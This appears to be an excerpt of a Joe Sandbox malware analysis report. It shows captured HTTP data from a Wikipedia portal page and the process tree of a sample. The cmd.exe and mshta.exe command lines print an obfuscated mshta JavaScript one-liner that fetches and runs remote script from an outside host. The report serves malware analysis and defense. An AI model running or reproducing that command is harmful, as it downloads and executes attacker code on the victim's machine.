            2024-05-23 18:20:08 UTC13730INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 57 69 6b 69 70 65 64 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 57 69 6b 69 70 65 64 69 61 20 69 73 20 61 20 66 72 65 65 20 6f 6e 6c 69 6e 65 20 65 6e 63 79 63 6c 6f 70 65 64 69 61 2c 20 63 72 65 61 74 65 64 20 61 6e 64 20 65 64 69 74 65 64 20 62 79 20 76 6f 6c 75 6e 74 65 65 72 73 20 61 72 6f 75 6e 64 20 74 68 65 20 77 6f 72 6c 64 20 61 6e 64 20 68 6f 73 74 65 64 20 62 79 20 74 68 65 20 57 69 6b 69 6d 65 64 69 61 20
            Data Ascii: <!DOCTYPE html><html lang="en" class="no-js"><head><meta charset="utf-8"><title>Wikipedia</title><meta name="description" content="Wikipedia is a free online encyclopedia, created and edited by volunteers around the world and hosted by the Wikimedia
            2024-05-23 18:20:08 UTC16320INData Raw: 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 32 70 78 20 30 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 32 70 78 20 30 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 32 70 78 20 30 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 6e 6f 6e 65 3b 77 6f 72 64 2d 73 70 61 63 69 6e 67 3a 6e 6f 72 6d 61 6c 7d 2e 73 75 67 67 65 73 74 69 6f 6e 2d 6c 69 6e 6b 2c 2e 73 75 67 67 65 73 74 69 6f 6e 73 2d 64 72 6f 70 64 6f 77 6e 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b
            Data Ascii: ox-shadow:0 2px 2px 0 rgba(0,0,0,.2);-moz-box-shadow:0 2px 2px 0 rgba(0,0,0,.2);box-shadow:0 2px 2px 0 rgba(0,0,0,.2);list-style-type:none;word-spacing:normal}.suggestion-link,.suggestions-dropdown{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;
            2024-05-23 18:20:08 UTC2718INData Raw: 2d 65 6e 61 62 6c 65 64 20 2e 6a 73 6c 31 30 6e 7b 6f 70 61 63 69 74 79 3a 30 7d 2e 6a 73 6c 31 30 6e 2d 76 69 73 69 62 6c 65 20 2e 63 65 6e 74 72 61 6c 2d 66 65 61 74 75 72 65 64 2c 2e 6a 73 6c 31 30 6e 2d 76 69 73 69 62 6c 65 20 2e 6a 73 6c 31 30 6e 7b 6f 70 61 63 69 74 79 3a 31 7d 40 6d 65 64 69 61 20 70 72 69 6e 74 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 61 7b 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 35 32 30 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73
            Data Ascii: -enabled .jsl10n{opacity:0}.jsl10n-visible .central-featured,.jsl10n-visible .jsl10n{opacity:1}@media print{body{background-color:transparent}a{color:#000!important;background:none!important;padding:0!important}a:link,a:visited{color:#520;background:trans
            2024-05-23 18:20:08 UTC16320INData Raw: 21 2d 2d 20 23 34 2e 20 65 73 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 20 2d 20 31 39 35 2c 33 32 35 2c 30 30 30 20 76 69 65 77 73 2f 64 61 79 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 72 61 6c 2d 66 65 61 74 75 72 65 64 2d 6c 61 6e 67 20 6c 61 6e 67 34 22 20 6c 61 6e 67 3d 22 65 73 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 61 20 69 64 3d 22 6a 73 2d 6c 69 6e 6b 2d 62 6f 78 2d 65 73 22 20 68 72 65 66 3d 22 2f 2f 65 73 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 22 20 74 69 74 6c 65 3d 22 45 73 70 61 c3 b1 6f 6c 20 e2 80 94 20 57 69 6b 69 70 65 64 69 61 20 e2 80 94 20 4c 61 20 65 6e 63 69 63 6c 6f 70 65 64 69 61 20 6c 69 62 72 65 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 2d 62 6f 78 22 20 64 61 74 61 2d 73 6c 6f 67 61 6e 3d 22 4c 61 20
            Data Ascii: !-- #4. es.wikipedia.org - 195,325,000 views/day --><div class="central-featured-lang lang4" lang="es" dir="ltr"><a id="js-link-box-es" href="//es.wikipedia.org/" title="Espaol Wikipedia La enciclopedia libre" class="link-box" data-slogan="La
            2024-05-23 18:20:08 UTC16320INData Raw: 65 66 3d 22 2f 2f 62 61 72 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 22 20 6c 61 6e 67 3d 22 62 61 72 22 3e 42 6f 61 72 69 73 63 68 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 2f 62 73 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 22 20 6c 61 6e 67 3d 22 62 73 22 3e 42 6f 73 61 6e 73 6b 69 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 2f 62 72 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 22 20 6c 61 6e 67 3d 22 62 72 22 3e 42 72 65 7a 68 6f 6e 65 67 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 2f 63 76 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 22 20 6c 61 6e 67 3d 22 63 76 22 20 74 69 74 6c 65 3d 22 c4 8c c4 83 76 61 c5 a1 6c 61 22 3e d0 a7 d3 91 d0 b2 d0 b0 d1 88 d0 bb
            Data Ascii: ef="//bar.wikipedia.org/" lang="bar">Boarisch</a></li><li><a href="//bs.wikipedia.org/" lang="bs">Bosanski</a></li><li><a href="//br.wikipedia.org/" lang="br">Brezhoneg</a></li><li><a href="//cv.wikipedia.org/" lang="cv" title="vala">
            2024-05-23 18:20:08 UTC128INData Raw: 2f 64 74 79 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 22 20 6c 61 6e 67 3d 22 64 74 79 22 3e e0 a4 a1 e0 a5 8b e0 a4 9f e0 a5 87 e0 a4 b2 e0 a5 80 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 2f 74 63 79 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 22 20 6c 61 6e 67 3d 22 74 63 79 22 3e e0 b2 a4 e0 b3 81 e0 b2 b3 e0 b3 81 3c 2f 61 3e 3c 2f 6c 69 3e 0a
            Data Ascii: /dty.wikipedia.org/" lang="dty"></a></li><li><a href="//tcy.wikipedia.org/" lang="tcy"></a></li>
            2024-05-23 18:20:08 UTC12524INData Raw: 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 68 32 20 63 6c 61 73 73 3d 22 62 6f 6f 6b 73 68 65 6c 66 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 62 6f 6f 6b 73 68 65 6c 66 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 0a 3c 62 64 69 20 64 69 72 3d 22 6c 74 72 22 3e 0a 31 30 30 2b 0a 3c 2f 62 64 69 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6a 73 6c 31 30 6e 22 20 64 61 74 61 2d 6a 73 6c 31 30 6e 3d 22 70 6f 72 74 61 6c 2e 65 6e 74 72 69 65 73 22 3e 0a 61 72 74 69 63 6c 65 73 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 68 32 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 61 6e 67 6c 69 73 74 20 6c 61 6e 67 6c 69 73 74 2d 74 69 6e 79 20 68 6c 69 73 74 22 20 64 61 74 61
            Data Ascii: </ul></div><h2 class="bookshelf-container"><span class="bookshelf"><span class="text"><bdi dir="ltr">100+</bdi><span class="jsl10n" data-jsl10n="portal.entries">articles</span></span></span></h2><div class="langlist langlist-tiny hlist" data


            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Click to jump to process

            Target ID:1
            Start time:14:20:04
            Start date:23/05/2024
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\cmd.exe" /c MshtA "JaVAsCrIpT:var _$_NXUI=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{GetObject(_$_NXUI[1])[_$_NXUI[0]]()}catch(e){};close()"
            Imagebase:0x7ff6f7280000
            File size:289'792 bytes
            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:2
            Start time:14:20:04
            Start date:23/05/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff75da10000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:3
            Start time:14:20:04
            Start date:23/05/2024
            Path:C:\Windows\System32\mshta.exe
            Wow64 process (32bit):false
            Commandline:MshtA "JaVAsCrIpT:var _$_NXUI=["\x4b\x49\x49\x54\x48\x5a\x4c","\163\x63\162\x69\160\x74\x3a\110\124\x74\x70\163\x3a\x2f\x2f\x63\x72\x6f\156\x61\x6c\x31\70\64\56\x70\x68\162\x6f\x61\x74\x69\166\x61\x2e\x63\157\155\x2e\142\x72\57\x3f\x32\x2f"];try{GetObject(_$_NXUI[1])[_$_NXUI[0]]()}catch(e){};close()"
            Imagebase:0x7ff70bcc0000
            File size:14'848 bytes
            MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:true

            Reset < >
              Memory Dump Source
              • Source File: 00000003.00000003.1231593742.0000029066320000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000029066320000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_3_29066320000_mshta.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
              • Instruction ID: 457f4e80c3b9bead5ff9f544ea6492a816836e5ac9f4469dbd7f78ea234969b7
              • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
              • Instruction Fuzzy Hash: C39002044D541E69D41411D10CA925D50886388150FD44484442690544D64D03AA2196